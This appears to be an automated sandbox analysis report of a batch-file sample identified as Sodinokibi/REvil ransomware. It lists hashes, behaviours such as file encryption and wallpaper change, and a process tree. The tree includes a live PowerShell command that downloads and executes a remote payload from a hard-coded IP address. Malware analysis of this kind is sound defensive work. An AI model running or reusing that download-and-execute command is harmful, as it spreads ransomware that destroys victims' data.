Analysis
-
max time kernel
118s -
max time network
127s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
24-08-2020 17:10
Static task
static1
Behavioral task
behavioral1
Sample
78db7807ce9e00993f72a5410cc869e8.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
78db7807ce9e00993f72a5410cc869e8.bat
Resource
win10
General
-
Target
78db7807ce9e00993f72a5410cc869e8.bat
-
Size
218B
-
MD5
289804e7e330a37b07416d754819db89
-
SHA1
8ed98b81615c3571fad40a840eae66f2de5fb035
-
SHA256
d9632dbb498dcc5c817f3d28376b83ce717767e8f2eda31dca931a781785dc09
-
SHA512
ac9649099ea34f88787d84761b3ea53acc436e847d91d2ac046d95cd176d8fe57a63b58ed726fae6f02507fe197e229ae664a4c903531642cd320ce1eeacce40
Malware Config
Extracted
http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8
Extracted
C:\754692-read-me.txt
sodinokibi
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 152 IoCs
Processes:
powershell.exeflow pid process 3 1424 powershell.exe 5 1424 powershell.exe 7 1424 powershell.exe 9 1424 powershell.exe 11 1424 powershell.exe 12 1424 powershell.exe 14 1424 powershell.exe 15 1424 powershell.exe 18 1424 powershell.exe 20 1424 powershell.exe 22 1424 powershell.exe 24 1424 powershell.exe 25 1424 powershell.exe 27 1424 powershell.exe 28 1424 powershell.exe 30 1424 powershell.exe 31 1424 powershell.exe 33 1424 powershell.exe 35 1424 powershell.exe 37 1424 powershell.exe 39 1424 powershell.exe 41 1424 powershell.exe 43 1424 powershell.exe 44 1424 powershell.exe 46 1424 powershell.exe 48 1424 powershell.exe 49 1424 powershell.exe 51 1424 powershell.exe 52 1424 powershell.exe 54 1424 powershell.exe 55 1424 powershell.exe 57 1424 powershell.exe 59 1424 powershell.exe 61 1424 powershell.exe 63 1424 powershell.exe 65 1424 powershell.exe 66 1424 powershell.exe 68 1424 powershell.exe 70 1424 powershell.exe 71 1424 powershell.exe 73 1424 powershell.exe 74 1424 powershell.exe 76 1424 powershell.exe 78 1424 powershell.exe 80 1424 powershell.exe 81 1424 powershell.exe 83 1424 powershell.exe 85 1424 powershell.exe 86 1424 powershell.exe 88 1424 powershell.exe 90 1424 powershell.exe 92 1424 powershell.exe 93 1424 powershell.exe 95 1424 powershell.exe 96 1424 powershell.exe 98 1424 powershell.exe 100 1424 powershell.exe 101 1424 powershell.exe 103 1424 powershell.exe 104 1424 powershell.exe 107 1424 powershell.exe 109 1424 powershell.exe 111 1424 powershell.exe 113 1424 powershell.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\GetUpdate.png => \??\c:\users\admin\pictures\GetUpdate.png.754692 powershell.exe File renamed C:\Users\Admin\Pictures\HideEdit.png => \??\c:\users\admin\pictures\HideEdit.png.754692 powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pg8439t9992y.bmp" powershell.exe -
Drops file in Program Files directory 29 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\UnlockRestart.otf powershell.exe File opened for modification \??\c:\program files\ReadConvertTo.DVR-MS powershell.exe File opened for modification \??\c:\program files\SearchStart.dxf powershell.exe File opened for modification \??\c:\program files\SplitProtect.mhtml powershell.exe File opened for modification \??\c:\program files\ShowCompress.wma powershell.exe File created \??\c:\program files\754692-read-me.txt powershell.exe File opened for modification \??\c:\program files\EditUnpublish.cfg powershell.exe File opened for modification \??\c:\program files\MoveUnpublish.dot powershell.exe File opened for modification \??\c:\program files\RegisterSelect.AAC powershell.exe File opened for modification \??\c:\program files\UnregisterPop.php powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\754692-read-me.txt powershell.exe File created \??\c:\program files (x86)\754692-read-me.txt powershell.exe File opened for modification \??\c:\program files\CheckpointPush.wax powershell.exe File opened for modification \??\c:\program files\DisconnectUndo.dotm powershell.exe File opened for modification \??\c:\program files\EditUnblock.tif powershell.exe File opened for modification \??\c:\program files\OutPublish.DVR powershell.exe File opened for modification \??\c:\program files\ShowGrant.mp4 powershell.exe File opened for modification \??\c:\program files\PopAssert.ini powershell.exe File opened for modification \??\c:\program files\UndoGrant.gif powershell.exe File opened for modification \??\c:\program files\ReadEnter.vbe powershell.exe File opened for modification \??\c:\program files\SkipProtect.ini powershell.exe File opened for modification \??\c:\program files\DenyInstall.easmx powershell.exe File opened for modification \??\c:\program files\DismountInitialize.wps powershell.exe File created \??\c:\program files\microsoft sql server compact edition\754692-read-me.txt powershell.exe File opened for modification \??\c:\program files\UnprotectRename.doc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\754692-read-me.txt powershell.exe File opened for modification \??\c:\program files\ResolveInvoke.tiff powershell.exe File opened for modification \??\c:\program files\SuspendSubmit.mpeg powershell.exe File opened for modification \??\c:\program files\UnprotectFind.js powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1424 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeTakeOwnershipPrivilege 1424 powershell.exe Token: SeBackupPrivilege 1852 vssvc.exe Token: SeRestorePrivilege 1852 vssvc.exe Token: SeAuditPrivilege 1852 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1060 wrote to memory of 1424 1060 cmd.exe powershell.exe PID 1060 wrote to memory of 1424 1060 cmd.exe powershell.exe PID 1060 wrote to memory of 1424 1060 cmd.exe powershell.exe PID 1060 wrote to memory of 1424 1060 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\78db7807ce9e00993f72a5410cc869e8.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8');Invoke-VHCXYJMKGXZ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1852